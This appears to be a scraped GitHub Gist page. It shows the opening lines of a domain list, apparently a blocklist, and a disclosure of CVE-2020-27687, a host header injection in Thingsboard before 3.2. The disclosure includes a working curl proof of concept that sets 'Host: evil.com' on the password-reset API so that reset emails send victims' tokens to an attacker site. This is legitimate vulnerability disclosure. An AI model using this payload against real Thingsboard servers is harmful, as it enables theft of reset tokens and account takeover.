Skip to content

Instantly share code, notes, and snippets.

@vin01
vin01 / hsts
Created October 12, 2021 19:11
This file has been truncated, but you can view the full file.
0.0.0.0.beeglivesex.com
0.tcp.ngrok.io
0.weathdata.nu
00-xx-00.no-ip.info
00.0.gmail.com.gmail.8.3.gmail.35.cad.creou.dev
000.gaysexe.free.fr
0000rrrvvv.duckdns.org
0001.2waky.com
000tristanprod.free.fr
0012b3a1.89dduvdjsi.shop
@vin01
vin01 / CVE-2020-27687.md
Last active January 13, 2021 10:04
CVE-2020-27687: Host header injection in Thingsboard prior to version 3.2

This vulnerability allows an attacker to inject host header which is used to generate password reset links among other things.

PoC:

curl 'https://thingsboard_host/api/noauth/resetPasswordByEmail' -H 'Host: evil.com'   -H 'Connection: keep-alive'   -H 'Accept: application/json, text/plain, */*'   -H 'User-Agent: Mozilla/5.0'   -H 'Content-Type: application/json'   -H 'Origin: https://thingsboard_host'   -H 'Sec-Fetch-Site: same-origin'   -H 'Sec-Fetch-Mode: cors'   -H 'Sec-Fetch-Dest: empty'   -H 'Referer: https://thingsboard_host/login/resetPasswordRequest'   -H 'Accept-Language: en-GB,en-US;q=0.9,en;q=0.8'   --data-binary '{"email":"victim@example"}'   --compressed

This will send an email to victim which points to https://evil.com instead of actual Thingsboard url. This allows an attacker to trick users into submitting their password reset tokens and new passwords to malicious websites linked from genuine Thingsboard mails.